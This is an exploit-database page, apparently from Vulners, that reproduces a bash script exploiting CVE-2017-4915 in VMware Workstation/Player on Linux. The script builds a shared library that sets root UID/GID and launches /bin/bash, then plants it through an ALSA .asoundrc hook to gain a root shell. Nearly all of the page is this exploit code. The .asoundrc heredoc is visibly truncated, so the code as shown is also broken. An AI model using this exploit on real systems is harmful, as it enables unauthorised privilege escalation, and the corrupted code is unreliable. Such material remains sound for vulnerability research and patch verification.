Vulners
Lucene search
VMware Workstation/Player < 12.5.5 - Local Privilege Escalation
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Exploit for CVE-2002-0526 | 12 Mar 202611:02 | – | githubexploit |
 | VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation Explo | 22 May 201700:00 | – | zdt |
| VMware Workstation - ALSA Config File Local Privilege Escalation Exploit | 6 Jan 201800:00 | – | zdt |
| VMware Workstation / Player < 12.5.5 - Local Privilege Escalation Exploit | 27 Jul 201900:00 | – | zdt |
 | CVE-2017-4915 | 22 May 201700:00 | – | circl |
 | VMware Workstation Pro for Linux and VMware Workstation Player for Linux Elevation of Privilege Vulnerability | 24 May 201700:00 | – | cnvd |
 | CVE-2017-4915 | 22 May 201714:00 | – | cve |
 | CVE-2017-4915 | 22 May 201714:00 | – | cvelist |
 | VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit) | 5 Jan 201800:00 | – | exploitdb |
 | VMware WorkstationPlayer 12.5.5 - Local Privilege Escalation | 30 Dec 201800:00 | – | exploitpack |
10
#!/bin/bash
################################################################################
# VMware Workstation Local Privilege Escalation exploit (CVE-2017-4915) #
# - https://www.vmware.com/security/advisories/VMSA-2017-0009.html #
# - https://www.exploit-db.com/exploits/42045/ #
# #
# Affects: #
# - VMware Workstation Player <= 12.5.5 #
# - VMware Workstation Pro <= 12.5.5 #
################################################################################
# ~ bcoles
VM_PLAYER=/usr/bin/vmplayer
GCC=/usr/bin/gcc
RAND_STR=$(echo $RANDOM | tr '[0-9]' '[a-zA-Z]')
VM_DIR=$HOME/.$RAND_STR
echo "[*] Creating directory $VM_DIR"
mkdir "$VM_DIR"
if [ $? -ne 0 ] ; then
echo "[-] Could not create $VM_DIR"
exit 1
fi
echo "[*] Writing $VM_DIR/$RAND_STR.c"
cat > "$VM_DIR/$RAND_STR.c" <<EOL
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <err.h>
extern char *program_invocation_short_name;
__attribute__((constructor)) void run(void) {
uid_t ruid, euid, suid;
if (getresuid(&ruid, &euid, &suid))
err(1, "getresuid");
printf("[*] Current UIDs: %d %d %d\n", ruid, euid, suid);
if (ruid == 0 || euid == 0 || suid == 0) {
if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
err(1, "setresxid");
printf("switched to root UID and GID");
system("/bin/bash");
_exit(0);
}
}
EOL
echo "[*] Compiling $VM_DIR/$RAND_STR.c"
$GCC -shared -o "$VM_DIR/$RAND_STR.so" "$VM_DIR/$RAND_STR.c" -fPIC -Wall -ldl -std=gnu99
if [ $? -ne 0 ] ; then
echo "[-] Compilation failed"
exit 1
fi
echo "[*] Removing $VM_DIR/$RAND_STR.c"
rm "$VM_DIR/$RAND_STR.c"
echo "[*] Writing $HOME/.asoundrc"
lib "$VM_DIR/$RAND_STR.so"
func "conf_pulse_hook_load_if_running"
}
EOL
echo "[*] Writing $VM_DIR/$RAND_STR.vmx"
cat > "$VM_DIR/$RAND_STR.vmx" <<EOL
.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "8"
scsi0.present = "FALSE"
memsize = "4"
ide0:0.present = "FALSE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
vmci0.present = "FALSE"
hpet0.present = "FALSE"
displayName = "$RAND_STR"
guestOS = "other"
nvram = "$RAND_STR.nvram"
virtualHW.productCompatibility = "hosted"
gui.exitOnCLIHLT = "FALSE"
powerType.powerOff = "soft"
powerType.powerOn = "soft"
powerType.suspend = "soft"
powerType.reset = "soft"
floppy0.present = "FALSE"
monitor_control.disable_longmode = 1
EOL
echo "[*] Disabling VMware hint popups"
if [ ! -d "$HOME/.vmware" ]; then
mkdir "$HOME/.vmware"
fi
if [ -f "$HOME/.vmware/preferences" ]; then
if grep -qi "hints.hideall" "$HOME/.vmware/preferences"; then
sed -i 's/hints\.hideAll\s*=\s*"FALSE"/hints.hideAll = "TRUE"/i' "$HOME/.vmware/preferences"
else
echo 'hints.hideAll = "TRUE"' >> "$HOME/.vmware/preferences"
fi
else
echo '.encoding = "UTF8"' > "$HOME/.vmware/preferences"
echo 'pref.vmplayer.firstRunDismissedVersion = "999"' >> "$HOME/.vmware/preferences"
echo 'hints.hideAll = "TRUE"' >> "$HOME/.vmware/preferences"
fi
echo "[*] Launching VMware Player..."
$VM_PLAYER "$VM_DIR/$RAND_STR.vmx"
echo "[*] Removing $HOME/.asoundrc"
rm "$HOME/.asoundrc"
echo "[!] Remove $VM_DIR when you're done"
rmdir "$VM_DIR"
################################################################################
# EOFData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Dec 2018 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.2
CVSS 37.8
EPSS0.11558